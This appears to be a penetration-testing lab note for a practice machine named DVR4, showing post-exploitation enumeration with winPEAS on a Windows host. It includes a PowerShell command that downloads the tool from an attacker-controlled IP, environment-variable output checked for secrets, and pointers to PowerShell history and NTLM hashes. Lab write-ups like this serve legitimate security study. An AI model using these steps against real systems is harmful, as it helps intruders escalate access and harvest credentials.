PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\Users\viewer> iwr -Uri http://192.168.45.209/winPEASx64.exe -OutFile .\winPEASx64.exeDelivery complete
PS C:\Users\viewer> .\winPEASx64.exeExecuting PEAS
ENV
←[1;36m╔══════════╣ ←[1;32mUser Environment Variables←[0m
←[1;36m╚ ←[1;34mCheck for some passwords or keys in the env variables ←[1;33m←[0m
←[1;37m SystemDrive: ←[0mC:
←[1;37m ProgramFiles(x86): ←[0mC:\Program Files (x86)
←[1;37m Path: ←[0mC:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\Syst
em32\OpenSSH\;C:\Users\viewer\AppData\Local\Microsoft\WindowsApps
←[1;37m ProgramW6432: ←[0mC:\Program Files
←[1;37m PROCESSOR_IDENTIFIER: ←[0mAMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
←[1;37m TMP: ←[0mC:\Users\viewer\AppData\Local\Temp
←[1;37m PROCESSOR_ARCHITECTURE: ←[0mAMD64
←[1;37m LANG: ←[0mC.UTF-8
←[1;37m PROCESSOR_REVISION: ←[0m0101
←[1;37m PSExecutionPolicyPreference: ←[0mBypass
←[1;37m BitviseSfsDll: ←[0m00000EF0-AA2C9413-44922A96-5AEE8FCD
←[1;37m TEMP: ←[0mC:\Users\viewer\AppData\Local\Temp
←[1;37m USERPROFILE: ←[0mC:\Users\viewer
←[1;37m USER←[0m←[1;31mNAME←[0m: ←[0mviewer
←[1;37m SystemRoot: ←[0mC:\WINDOWS
←[1;37m WINSSHDGROUP: ←[0mEVERYONE
←[1;37m SSHWINUSER: ←[0mviewer
←[1;37m CommonProgramFiles: ←[0mC:\Program Files\Common Files
←[1;37m ProgramData: ←[0mC:\ProgramData
←[1;37m HOMEPATH: ←[0m\Users\viewer
←[1;37m COMPUTER←[0m←[1;31mNAME←[0m: ←[0mDVR4
←[1;37m ALLUSERSPROFILE: ←[0mC:\ProgramData
←[1;37m SSH_CONNECTION: ←[0m192.168.45.209 39308 192.168.150.179 22
←[1;37m SSHWINUSERDOMAIN: ←[0mDVR4
←[1;37m SSHWINGROUP: ←[0mEVERYONE
←[1;37m DriverData: ←[0mC:\Windows\System32\Drivers\DriverData
←[1;37m HOMEDRIVE: ←[0mC:
←[1;37m windir: ←[0mC:\WINDOWS
←[1;37m NUMBER_OF_PROCESSORS: ←[0m2
←[1;37m OS: ←[0mWindows_NT
←[1;37m SSH←[0m←[1;31mSESSIONID←[0m: ←[0m1024
←[1;37m ProgramFiles: ←[0mC:\Program Files
←[1;37m ComSpec: ←[0mC:\WINDOWS\system32\cmd.exe
←[1;37m PATHEXT: ←[0m.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
←[1;37m HOME: ←[0mC:\Users\viewer
←[1;37m PSModulePath: ←[0mC:\Users\viewer\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\s
ystem32\WindowsPowerShell\v1.0\Modules
←[1;37m PROMPT: ←[0m$P$G
←[1;37m SSH_CLIENT: ←[0m192.168.45.209 39308 22
←[1;37m APPDATA: ←[0mC:\Users\viewer\AppData\Roaming
←[1;37m USERDOMAIN: ←[0mDVR4
←[1;37m PROCESSOR_LEVEL: ←[0m25
←[1;37m LOCALAPPDATA: ←[0mC:\Users\viewer\AppData\Local
←[1;37m CommonProgramW6432: ←[0mC:\Program Files\Common Files
←[1;37m BVSSHSERVERINSTANCE: ←[0mBitvise SSH Server
←[1;37m CommonProgramFiles(x86): ←[0mC:\Program Files (x86)\Common Files
←[1;37m PUBLIC: ←[0mC:\Users\Public
←[1;37m SSHSTARTID: ←[0m3JN65VS5RDQ3XHNG
←[1;36m╔══════════╣ ←[1;32mSystem Environment Variables←[0m
←[1;36m╚ ←[1;34mCheck for some passwords or keys in the env variables ←[1;33m←[0m
←[1;37m ComSpec: ←[0mC:\WINDOWS\system32\cmd.exe
←[1;37m DriverData: ←[0mC:\Windows\System32\Drivers\DriverData
←[1;37m OS: ←[0mWindows_NT
←[1;37m Path: ←[0mC:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\Syst
em32\OpenSSH\
←[1;37m PATHEXT: ←[0m.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
←[1;37m PROCESSOR_ARCHITECTURE: ←[0mAMD64
←[1;37m PSModulePath: ←[0mC:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
←[1;37m TEMP: ←[0mC:\WINDOWS\TEMP
←[1;37m TMP: ←[0mC:\WINDOWS\TEMP
←[1;37m USER←[0m←[1;31mNAME←[0m: ←[0mSYSTEM
←[1;37m windir: ←[0mC:\WINDOWS
←[1;37m NUMBER_OF_PROCESSORS: ←[0m2
←[1;37m PROCESSOR_LEVEL: ←[0m25
←[1;37m PROCESSOR_IDENTIFIER: ←[0mAMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
←[1;37m PROCESSOR_REVISION: ←[0m0101AV
/Practice/DVR4/4-Post_Enumeration/attachments/{2FCD08F5-0791-4DF6-8112-1937AB2C86D0}.png)
UAC
/Practice/DVR4/4-Post_Enumeration/attachments/{4D66B817-D107-44E9-A953-A32704CF70E1}.png)
PowerShell
/Practice/DVR4/4-Post_Enumeration/attachments/{B53D3D9C-B570-4FF3-A7D3-129851C447A3}.png)
C:\Users\viewer\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
NTLM
/Practice/DVR4/4-Post_Enumeration/attachments/{196C4FDB-5B8A-446C-A80E-4DACFDE4248E}.png)
/Practice/DVR4/4-Post_Enumeration/attachments/{A68FAA12-FC36-4D97-8FE3-65B72CCE996E}.png)